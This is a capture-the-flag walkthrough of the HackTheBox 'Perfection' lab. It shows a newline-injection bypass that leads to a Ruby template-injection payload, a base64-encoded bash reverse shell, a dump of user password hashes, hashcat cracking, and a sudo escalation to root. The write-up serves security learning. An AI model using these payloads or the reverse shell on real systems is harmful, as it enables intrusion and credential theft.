Logo . / chrisalupului
htb: perfection walkthrough

htb: perfection walkthrough

Chris Alupului Chris Alupului
July 12, 2024
4 min read
hackthebox walkthrough ethical hacking
Next Post htb: permx sanity check
Previous Post Last post!
Table of Contents
Solver
c chris alupului
Author
Created by TheRedeemed1
Category
Linux · Easy
Release
02 Mar, 2024

Easy Linux machine featuring a DNS server and multiple virtual hosts, each requiring different steps to gain a foothold.

Perfection features a grade calculator with input filtering, bypassed via newline injection. Exploiting Ruby SSTI grants execution, leading to a database of hashes and a password format hint. Using Hashcat, I’ll crack them for root access. In Beyond Root, we analyze the Ruby webserver and SSTI.

Recon

Nmap scan

Nmap -p 22,80 -sC -sV perfection.htb
 
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80e479e85928df952dad574a4604ea70 (ECDSA)
|   256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open  http    syn-ack nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Information Disclosure

perfection.htb
<!-- Footer -->
 <footer>
<p class="copyright">Copyright Secure Student Tools. All rights reserved<br><b>Powered by WEBrick 1.7.0</b></p>
</footer>

Base64 encoded

base64 <<< "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1" | sed 's/\+/\%2b/'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=

Payload Injection - Base64 - Reverse Shell

Burp repeater request. Important note: %0A is the new line bypass, which allows anything to be injected after it, including a reverse shell

Burp Suite Payload
category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=+|+base64+-d+|+bash");%25>&grade1=1&weight1=100&category2=00&grade2=0&weight2=0&category3=0&grade3=0&weight3=0&category4=0&grade4=0&weight4=0&category5=0&grade5=0&weight5=0cd

Footdhold - Susan

nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.253 57674
bash: cannot set terminal process group (1000): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$
susan@perfection:~$ id
uid=1001(susan) gid=1001(susan) groups=1001(susan), 27(sudo)
susan@perfection:~$

Susan has sudo but requires password

Migration - sqlite database

Holding password hashes for several users

pupilpath_credentials.db
susan@perfection:~/Migration$ sqlite3 pupilpath_credentials.db 
SQLite version 3.37.2
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
usernames.txt
Susan Miller
Tina Smith
Harry Tyler
David Lawrence
Stephen Locke
passwords.txt
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8

We copied these and threw them into some text files

Hashcat bruteforcing

hashcat -m 1400 susan_hash.txt -a 3 'susan_nasus_?d?d?d?d?d?d?d?d?d'
 
hashcat (v6.2.6) starting
 
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux) - Platform 
=========================================================
* Device #1: gameboy
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash
 
abeb6f8e<SNIP>9023f:susan_nasus_413759210
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Wed Jul 17 00:34:36 2024 (22 secs)
Time.Estimated...: Wed Jul 17 00:34:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14500.5 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324567040/1000000000 (32.46%)
Rejected.........: 0/324567040 (0.00%)
Restore.Point....: 324550656/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_354540610 -> susan_nasus_700440610
 
Started: Wed Jul 17 00:34:28 2024
Stopped: Wed Jul 17 00:34:27 2024

Root flag

susan@perfection:~$ sudo su
[sudo] password for susan: 
root@perfection:/home/susan# cd /root
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
f57***************8ea534
root@perfection:~#

Notes

The \n url encoded to %0A was the important bypass for a payload injection with a reverese shell.

Next Post htb: permx sanity check
Previous Post Last post!